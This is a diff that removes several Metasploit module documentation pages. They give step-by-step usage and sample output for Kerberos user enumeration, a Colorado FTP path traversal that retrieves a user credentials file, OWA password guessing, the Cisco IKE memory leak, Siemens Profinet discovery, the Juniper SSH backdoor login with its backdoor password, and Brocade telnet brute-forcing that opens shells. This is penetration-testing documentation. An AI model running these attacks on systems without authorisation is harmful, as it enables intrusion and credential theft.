-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.41 - CN=NeXpose Security Console, O=Rapid7
-...
-
-```
-
-### IPv4 Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE ipv4
-CENSYS_SEARCHTYPE => ipv4
-[*] 197.117.5.36 - 443/https
-[*] 208.118.237.81 - 443/https
-[*] 206.19.237.19 - 443/https
-[*] 54.214.49.70 - 80/http,443/https
-[*] 208.118.237.241 - 443/https
-[*] 162.220.246.141 - 443/https,22/ssh,80/http
-[*] 31.214.157.19 - 443/https,22/ssh
-[*] 52.88.1.225 - 443/https,22/ssh
-[*] 208.118.227.12 - 25/smtp
-[*] 38.107.201.41 - 443/https
-[*] 52.44.56.126 - 80/http,443/https
-[*] 52.54.227.6 - 443/https,80/http
-[*] 23.217.253.242 - 443/https,80/http
-[*] 96.6.3.45 - 80/http,443/https
-[*] 23.6.73.47 - 443/https,80/http
-[*] 23.78.99.243 - 80/http,443/https
-[*] 23.53.51.170 - 80/http,443/https
-[*] 23.62.201.47 - 443/https,80/http
-[*] 2.23.50.157 - 443/https,80/http
-[*] 118.215.191.13 - 80/http,443/https
-[*] 2.19.185.28 - 80/http,443/https
-[*] 2.18.195.99 - 443/https,80/http
-[*] 23.197.196.25 - 443/https,80/http
-[*] 95.100.104.181 - 443/https,80/http
-[*] 2.20.37.130 - 80/http,443/https
-[*] 23.194.237.34 - 443/https,80/http
-[*] 2.17.140.86 - 443/https,80/http
-[*] 64.125.235.5 - 25/smtp
-[*] 208.118.227.32 - 80/http
-[*] 2.21.129.149 - 80/http,443/https
-[*] 2.20.167.33 - 80/http,443/https
-[*] 95.100.139.218 - 80/http,443/https
-[*] 23.38.88.202 - 443/https,80/http
-[*] 2.17.184.80 - 443/https,80/http
-[*] 23.59.119.23 - 80/http,443/https
-[*] 2.16.14.225 - 443/https,80/http
-[*] 104.113.122.33 - 443/https,80/http
-[*] 23.223.44.164 - 80/http,443/https
-[*] 88.221.120.214 - 443/https,80/http
-[*] 23.47.36.145 - 443/https,80/http
-[*] 2.23.21.254 - 80/http,443/https
-[*] 208.118.237.39 - 443/https
-[*] 208.118.237.40 - 443/https
-[*] 208.118.237.41 - 443/https
-[*] 23.54.217.47 - 80/http,443/https
-[*] 96.17.254.188 - 443/https,80/http
-[*] 184.25.129.65 - 443/https,80/http
-[*] 104.121.167.123 - 443/https,80/http
-[*] 104.94.110.63 - 443/https,80/http
-[*] 104.91.11.216 - 80/http,443/https
-[*] 23.38.233.47 - 80/http,443/https
-[*] 52.86.110.89 - 80/http,443/https
-[*] 69.192.73.47 - 443/https,80/http
-[*] 184.86.57.47 - 443/https,80/http
-[*] 104.86.45.180 - 443/https,80/http
-[*] 184.87.72.153 - 80/http,443/https
-[*] 23.66.25.47 - 80/http,443/https
-[*] 23.56.162.76 - 80/http,443/https
-[*] 184.87.133.242 - 443/https,80/http
-[*] 23.55.74.28 - 80/http,443/https
-[*] 23.6.225.84 - 80/http,443/https
-[*] 23.46.133.153 - 443/https,80/http
-[*] 23.10.121.47 - 443/https,80/http
-[*] 104.109.35.169 - 80/http,443/https
-[*] 172.227.101.182 - 80/http,443/https
-[*] 184.27.23.104 - 80/http,443/https
-[*] 23.49.185.47 - 80/http,443/https
-[*] 23.67.172.177 - 80/http,443/https
-[*] 23.62.170.161 - 443/https,80/http
-[*] 23.219.71.35 - 443/https,80/http
-[*] 104.82.94.233 - 443/https,80/http
-[*] 184.26.73.47 - 80/http,443/https
-[*] 104.68.108.237 - 80/http,443/https
-[*] 23.60.39.77 - 80/http,443/https
-[*] 23.66.100.92 - 80/http,443/https
-[*] 23.61.28.182 - 443/https,80/http
-[*] 23.42.116.233 - 80/http,443/https
-[*] 104.105.14.197 - 80/http,443/https
-[*] 104.103.203.240 - 80/http,443/https
-[*] 104.65.57.235 - 80/http,443/https
-[*] 23.41.83.224 - 80/http,443/https
-[*] 184.51.185.47 - 80/http,443/https
-[*] 23.67.231.142 - 80/http,443/https
-[*] 208.118.237.38 - 443/https
-[*] 104.76.25.28 - 80/http,443/https
-[*] 23.196.125.176 - 443/https,80/http
-[*] 23.40.154.224 - 80/http,443/https
-[*] 23.77.33.204 - 443/https,80/http
-[*] 104.88.21.48 - 80/http,443/https
-[*] 173.223.134.47 - 80/http,443/https
-[*] 23.4.98.72 - 80/http,443/https
-[*] 23.44.97.3 - 80/http,443/https
-[*] 23.203.66.142 - 443/https,80/http
-[*] 23.42.216.251 - 443/https,80/http
-[*] 23.42.85.25 - 80/http,443/https
-[*] 173.255.195.131 - 80/http,23/telnet,25/smtp,110/pop3,53/dns,443/https,22/ssh
-[*] 104.83.219.182 - 443/https,80/http
-[*] 184.86.41.47 - 443/https,80/http
-[*] 104.97.72.196 - 443/https,80/http
-[*] 69.192.169.48 - 443/https,80/http
-```
-
-### Websites Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE websites
-CENSYS_SEARCHTYPE => websites
-msf auxiliary(censys_search) > run
-
-[+] rapid7.com - [37743]
-[+] logentries.com - [45346]
-[+] venturefizz.com - [106102]
-[+] gild.com - [116853]
-[+] sectools.org - [122125]
-[+] ericzhang.me - [155622]
-[+] metasploit.com - [156435]
-[+] datapipe.com - [209756]
-[+] routerpwn.com - [317896]
-[+] proxy-base.com - [507954]
-[+] config.fr - [542346]
-[+] winterwyman.com - [629471]
-[+] gogrid.com - [741009]
-[+] wesecure.nl - [997423]
-[*] Auxiliary module execution completed
-```
-
-
-## References
-
-1. https://censys.io/api
@@ -1,99 +0,0 @@
-The kerberos_enumusers module is used to enumerate valid Domain Users
-via Kerberos from a wholly unauthenticated perspective. It utilises the
-different responses returned by the service to identify users that exist
-within the target domain. It is also able to identify whether user
-accounts are enabled or disabled/locked out.
-
-## Target
-
-To use kerberos_enumusers, make sure you are able to connect to the
-Kerberos service on a Domain Controller.
-
-## Scenario
-
-The following demonstrates basic usage, using a custom wordlist,
-targeting a single Domain Controller to identify valid domain user
-accounts.
-
-```
-msf > use auxiliary/gather/kerberos_enumusers
-msf auxiliary(kerberos_enumusers) > set DOMAIN MYDOMAIN
-DOMAIN => MYDOMAIN
-msf auxiliary(kerberos_enumusers) > set RHOST 192.168.5.1
-RHOST => 192.168.5.1
-msf auxiliary(kerberos_enumusers) > set USER_FILE /job/users.txt
-USER_FILE => /job/users.txt
-msf auxiliary(kerberos_enumusers) > run
-
-[*] Validating options...
-[*] Using domain: MYDOMAIN...
-[*] 192.168.5.1:88 - Testing User: "bob"...
-[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
-pre-authentication required
-[+] 192.168.5.1:88 - User: "bob" is present
-[*] 192.168.5.1:88 - Testing User: "alice"...
-[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
-pre-authentication required
-[+] 192.168.5.1:88 - User: "alice" is present
-[*] 192.168.5.1:88 - Testing User: "matt"...
-[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
-pre-authentication required
-[+] 192.168.5.1:88 - User: "matt" is present
-[*] 192.168.5.1:88 - Testing User: "guest"...
-[*] 192.168.5.1:88 - KDC_ERR_CLIENT_REVOKED - Clients credentials have
-been revoked
-[-] 192.168.5.1:88 - User: "guest" account disabled or locked out
-[*] 192.168.5.1:88 - Testing User: "admint"...
-[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
-Kerberos database
-[*] 192.168.5.1:88 - User: "admint" does not exist
-[*] 192.168.5.1:88 - Testing User: "admin"...
-[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
-Kerberos database
-[*] 192.168.5.1:88 - User: "admin" does not exist
-[*] 192.168.5.1:88 - Testing User: "administrator"...
-[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
-Kerberos database
-[*] 192.168.5.1:88 - User: "administrator" does not exist
-[*] Auxiliary module execution completed
-msf auxiliary(kerberos_enumusers) >
-```
-
-## Options
-
-The kerberos_enumusers module only requires the RHOST, DOMAIN and
-USER_FILE options to run.
-
-**The DOMAIN option**
-
-This option is used to specify the target domain. If the domain name is
-incorrect an error is returned and domain user account enumeration will fail.
-
-An example of setting DOMAIN:
-
-```
-set DOMAIN [domain name]
-```
-
-**The USER_FILE option**
-
-This option is used to specify the file containing a list of user names
-to query the Domain Controller to identify if they exist in the target domain
-or not. One per line.
-
-An example of setting USER_FILE:
-
-```
-set USER_FILE [path to file]
-```
-
-**The Timeout option**
-
-This option is used to specify the TCP timeout i.e. the time to wait
-before a connection to the Domain Controller is established and data read.
-
-An example of setting Timeout:
-
-```
-set Timeout [value in seconds]
-```
@@ -1,61 +0,0 @@
-## Notes
-
-While the application is based in java, I was only able to get it to exploit against Windows based targets.
-
-## Vulnerable Application
-
-  [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
-  
-When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/ftp/colorado_ftp_traversal`
-  4. Do: `set rhosts <ip>`
-  5. Do: `run`
-  6. You should get the xml-users.xml file
-
-## Options
-
-  **FTPUSER**
-
-  Default user for Colorado FTP is `ftpuser`
-
-  **FTPPASS**
-
-  Default password for Colorado FTP is `ftpuser123`
-
-  **DEPTH**
-
-  Default depth of ../ to do is 2 to get back to the root of Colorado FTP.  This can run anywhere, so you may have to play a bit to find the root.
-
-## Scenarios
-
-  A run to obtain the user file (default in this case)
-
-    msf > use auxiliary/scanner/ftp/colorado_ftp_traversal
-    msf auxiliary(colorado_ftp_traversal) > set rhosts 1.1.1.1
-    rhosts => 1.1.1.1
-    msf auxiliary(colorado_ftp_traversal) > set verbose true
-    verbose => true
-    msf auxiliary(colorado_ftp_traversal) > exploit
-    
-    [*] 1.1.1.1:21      - Connecting to FTP server 1.1.1.1:21...
-    [*] 1.1.1.1:21      - Connected to target FTP server.
-    [*] 1.1.1.1:21      - Authenticating as ftpuser with password ftpuser123...
-    [*] 1.1.1.1:21      - Sending password...
-    [*] 1.1.1.1:21      - \\\..\..\conf\xml-users.xml
-    [*] 1.1.1.1:21      - 150 Opening A mode data connection for \\\..\..\conf\xml-users.xml.
-    
-    [*] 1.1.1.1:21      - Data returned:
-    
-    <users>
-    
-      <user name="ftpuser" pass="ftpuser123"/>
-    
-    </users>
-    [+] 1.1.1.1:21      - Stored conf\xml-users.xml to /root/.msf4/loot/20160918184409_default_1.1.1.1_coloradoftp.ftp._168381.xml
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
@@ -1,23 +0,0 @@
-This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
-
-## Verification Steps
-
-1. Do: ```use auxiliary/scanner/http/owa_ews_login```
-2. Do: ```set RHOSTS [IP]```
-3. Set TARGETURI if necessary.
-4. Do: ```run```
-
-## Sample Output
-
-```
-msf auxiliary(owa_ews_login) > run
-
-[+] Found NTLM service at /ews/ for domain OWAMSF.
-[+] OWA_EWS - Successful login: Administrator:monkey
-[-] OWA_EWS - Failed login: root:
-[-] OWA_EWS - Failed login: admin:
-[-] OWA_EWS - Failed login: guest:
-[-] OWA_EWS - Failed login: root:root
-[-] OWA_EWS - Failed login: root:password
-[-] OWA_EWS - Failed login: root:1234
-```
@@ -1,34 +0,0 @@
-This module is for CVE-2016-6415, A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
-
-The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
-
-## Verification Steps
-
-1. Do: ```use auxiliary/scanner/ike/cisco_ike_benigncertain```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set RPORT [PORT]```
-4. Do: ```run```
-
-## Sample Output
-
-```
-msf auxiliary(cisco_ike_benigncertain) > show options
-
-Module options (auxiliary/scanner/ike/cisco_ike_benigncertain):
-
-   Name        Current Setting                                                                            Required  Description
-   ----        ---------------                                                                            --------  -----------
-   PACKETFILE  /opt/metasploit-framework/data/exploits/cve-2016-6415/sendpacket.raw                       yes       The ISAKMP packet file
-   RHOSTS      192.168.1.2                                                                                yes       The target address range or CIDR identifier
-   RPORT       500                                                                                        yes       The target port
-   THREADS     1                                                                                          yes       The number of concurrent threads
-
-msf auxiliary(cisco_ike_benigncertain) > set verbose True
-msf auxiliary(cisco_ike_benigncertain) > run
-
-[*] Printable info leaked:
->5..).........9.................................................................x...D.#..............+#.........\.....?.L...l...........h.............#.....................l...\...........l.....X.................a.#...R....X.....y#.........x...@V$.\.............X.<....X................W....._y>..#t... .....H...X.....W.......................................>.$...........>5..).............................!.....:3.K......X.............xV4.xV4.xV4.......................................X...........X.:3.KxV4.xV4.................$...m;......xV4.xV4.xV4.xV4.xV4.xV4.xV4.xV4...........!.....<<<<........................................................................................................................................................<<<<....................$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<<<<1.......................................<<<<....9....... .......d....................Q..........<<<<....9....... ...............(............Q..........<<<<........................CI................................................................................ab_cdefg_pool...................................................................................................................................................................................ozhu7vp...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
-[+] 192.168.1.2:500 - IKE response with leak
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
@@ -1,76 +0,0 @@
-Siemens Industrial controllers and most other industrial OEMs 
-use a proprietary protocol to discover their devices accross a network.
-In the case of Siemens this is called the Profinet Discover Protocol. 
-Known in Wireshark as PN_DCP
-
-It works purely on Layer 2 (Ethernet addresses) and sends out a single
-multicast packet (making it safe to use in sensitive networks). 
-Each profinet enabled responds with an array of information:
- Its IP address, Subnetmask and Gateway
- Its Profinet Devicename ('Station Name')
- The Type of station
- A Vendor ID (e.g. '002a'), signifing the vendor (e.g. 'Siemens')
- A Device Role (e.g. '01'), signifing the type of device (e.g. 'IO-Controller')
- A Device ID (e.g. '010d'), signifing the device type (e.g. 'S7-1200')
-
-## Vulnerable Application
-
-This is a hardware choice of design, and as such CANNOT be changed without
-loss of compatibility. 
-Possible mitigations include: pulling the plug (literally), using network isolation
-(Firewall, Router, IDS, IPS, network segmentation, etc...) or not allowing bad
-people on your network.
-
-Most, if not all, PLC's (computers that control engines, robots, conveyor
-belts, sensors, camera's, doorlocks, CRACs ...) have vulnerabilities where,
-using their own tools, remote configuration and programming can be done
-*WITHOUT* authentication.  Investigators and underground hackers are just now
-creating simple tools to convert the, often proprietary, protocols into simple
-scripts.  The operating word here is "proprietary". Right now, the only thing
-stopping very bad stuff from happening. 
-
-## Verification Steps
-
-The following demonstrates a basic scenario, we "detect" two devices:
-
-```
-msf > search profinet
-msf > use auxiliary/scanner/scada/profinet_siemens
-msf auxiliary(profinet_siemens) > run
-
-[*] Sending packet out to eth0
-[+] Parsing packet from 00:0e:8c:cf:7b:1a
-Type of station: ET200S CPU
-Name of station: pn-io-1
-Vendor and Device Type: Siemens, ET200S
-Device Role: IO-Controller
-IP, Subnetmask and Gateway are: 172.16.108.11, 255.255.0.0, 172.16.108.11
-
-[+] Parsing packet from 00:50:56:b6:fe:b6
-Type of station: SIMATIC-PC
-Name of station: nm
-Vendor and Device Type: Siemens, PC Simulator
-Device Role: IO-Controller
-IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
-
-[+] I found 2 devices for you!
-[*] Auxiliary module execution completed
-```
-
-## Module Options
-```
-msf auxiliary(profinet_siemens) > show options
-
-Module options (auxiliary/scanner/scada/profinet_siemens):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   INTERFACE  eth0             yes       Set an interface
-   TIMEOUT    2                yes       Seconds to wait, set longer on slower networks
-```
-
-By default, the module uses interface 'eth0', there is a check to see if it is live.
-
-The module will send out an ethernet packet and wait for responses.
-By default, it will wait 2 seconds for any responses, this is long enough for most networks.
-Increase this on larger and/or slower networks, it just increases the wait time.
@@ -115,12 +115,3 @@ set SMBPass [password]

 Note: If an account has been successfully brute-forced, that account will not be tried again.

-Additionally, if you wish to disable automatic detection of all-access systems, you can change the following option:
-
-**The DETECT_ANY_AUTH option**
-
-This option enables detection of systems accepting any authentication. A bogus login will be attempted.
-
-```
-set DETECT_ANY_AUTH false
-```
@@ -1,33 +0,0 @@
-## Vulnerable Application
-
-  Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
-  
-  A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
-
-  For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
-  4. Do: `set rhosts`
-  5. Do: `run`
-  6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
-
-## Scenarios
-
-  Example run against a Juniper SSG5 with vuln firmware from above link.
-
-```
-msf > use auxiliary/scanner/ssh/juniper_backdoor
-msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
-rhosts => 192.168.1.1
-msf auxiliary(juniper_backdoor) > set verbose true
-verbose => true
-msf auxiliary(juniper_backdoor) > run
-
-[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
@@ -1,242 +0,0 @@
-## Vulnerable Application
-
-  This module is a login bruteforcer against Brocade network device's `enable` feature.
-  
-To configure the device in a vulnerable fashion, follow these steps:
-  1. Set authentication mode via: `aaa authentication enable default local`
-
-This module works against `enable` so we want to ensure telnet itself has no auth
-  **The following should not be set**: `enable telnet authentication`
-  
-This module has been verified against:
-  1. ICX6450-24 SWver 07.4.00bT311
-  2. FastIron WS 624 SWver 07.2.02fT7e1
-
-An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
-
-## Verification Steps
-
-  1. Install the emulator or device
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
-  4. Create/set a password file: `set pass_file /<passwords.lst>`
-  5. If desired: `set user_as_pass true`
-  6. Do: `set rhosts <ip>`
-  7. Do: `run`
-  8. You should get a shell.
-
-## Scenarios
-
-  Example run against ICX6450-24 SWver 07.4.00bT311
-
-```
-msf > use auxiliary/scanner/telnet/brocade_enable_login 
-msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
-pass_file => /passwords.lst
-msf auxiliary(brocade_enable_login) > set user_as_pass true
-user_as_pass => true
-msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
-rhosts => 192.168.50.1
-msf auxiliary(brocade_enable_login) > run
-
-[*]  Attempting username gathering from config on 192.168.50.1
-[*]    Found: admin@192.168.50.1
-[*]    Found: read@192.168.50.1
-[*]    Found: port@192.168.50.1
-[*]  Attempting username gathering from running-config on 192.168.50.1
-[*]    Found: admin@192.168.50.1
-[*]    Found: read@192.168.50.1
-[*]    Found: port@192.168.50.1
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
-[*] Attempting to start session 192.168.50.1:23 with admin:admin
-[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
-[*] Attempting to start session 192.168.50.1:23 with read:read
-[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
-[*] Attempting to start session 192.168.50.1:23 with port:port
-[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(brocade_enable_login) > sessions -l
-
-Active sessions
-===============
-
-  Id  Type    Information                           Connection
-  --  ----    -----------                           ----------
-  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
-  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
-  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
-
-msf auxiliary(brocade_enable_login) > session -i 1
-[-] Unknown command: session.
-msf auxiliary(brocade_enable_login) > sessions -i 1
-[*] Starting interaction with 1...
-
-show sessions ?
-Unrecognized command
-BR-telnet@FWS624 Router#show ?
-  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
-  aaa                    Show TACACS+ and RADIUS server statistics
-  access-list            show IPv4 access-list information
-  acl-on-arp             Show ARP ACL filtering
-  arp                    Arp table
-  auth-mac-addresses     MAC Authentication status
-  batch                  Batch commands
-  boot-preference        System boot preference
-  buffer-profile         Displays active profile
-  cable-diagnostics      Show Cable Diagnostics
-  chassis                Power supply/fan/temperature
-  clock                  System time and date
-  configuration          Configuration data in startup config file
-  cpu-utilization        CPU utilization rate
-  debug                  Debug information
-  default                System default settings
-  dot1x                  Dot1x information
-  errdisable             Errdisable status
-  fdp                    CDP/FDP information
-  flash                  Flash memory contents
-  gvrp                   GVRP information
-  inline                 inline power information
-  interfaces             Port status
--More--, next page: Space, next line: Return key, quit: Control-c 
-  ip                     IP address setting
-  ipv6                   IP setting
-  license                Show license information
-  link-aggregate         802.3ad Link Aggregation Information
-  link-error-disable     Link Debouncing Control
-  link-keepalive         Link Layer Keepalive
-  lldp                   Link-Layer Discovery Protocol information
-  local-userdb           Local User Database information
-  logging                System log
-  loop-detection         loop detection status & disabled ports
-  mac-address            MAC address table
-  media                  1Gig/10G port media type
-  memory                 System memory usage
-  metro-ring             Metro ring protocol information
-  mirror                 Mirror ports
-  module                 Module type and status
-  monitor                Monitor ports
-  mstp                   show MSTP (IEEE 802.1s) information
-  optic                  Optic Temperature and Power
-  port                   Show port security
-  priority-mapping       802.1Q tagged priority setting
-  processes              Active process statistics
-  protected-link-group   Show Protected Link Group Details
--More--, next page: Space, next line: Return key, quit: Control-c 
-  ptrace                 Global ptrace information
-  qd-buffer-profile      User configured buffer/descriptor profiles
-  qos-profiles           QOS configuration
-  qos-tos                IPv4 ToS based QoS
-  radius                 show radius server debug info
-  rate-limit             Rate-limiting table and actions
-  redundancy             Display management redundancy details
-  relative-utilization   Relative utilization list
-  reload                 Scheduled system reset
-  reserved-vlan-map      Reserved VLAN map status
-  rmon                   Rmon status
-  running-config         Current running-config
-  scheduler-profile      User configured scheduling profiles
-  sflow                  sFlow information
-  snmp                   SNMP statistics
-  sntp                   Show SNTP
-  span                   Spanning tree status
-  statistics             Packet statistics
-  stp-bpdu-guard         BPDU Guard status
-  stp-group              Spanning Tree Group Membership
-  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
-                         counters
-  table-mac-vlan         MAC Based VLAN status
--More--, next page: Space, next line: Return key, quit: Control-c 
-  tech-support           System snap shot for tech support
-  telnet                 Telnet connection
-  topology-group         Topology Group Membership
-  traffic-policy         Show traffic policy definition
-  trunk                  Show trunk status
-  users                  User accounts
-  v6-l4-acl-sessions     Show IPv6 software sessions
-  version                System status
-  vlan                   VLAN status
-  vlan-group             VLAN Group Membership
-  voice-vlan             Show voice vlan
-  vsrp                   Show VSRP commands
-  web-connection         Current web connections
-  webauth                web authentication information
-  who                    User login
-  |                      Output modifiers
-  <cr>
-BR-telnet@FWS624 Router#
-```
-
-  Example run against emulator mentioned above:
-
-```
-msf > use auxiliary/scanner/telnet/brocade_enable_login 
-msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
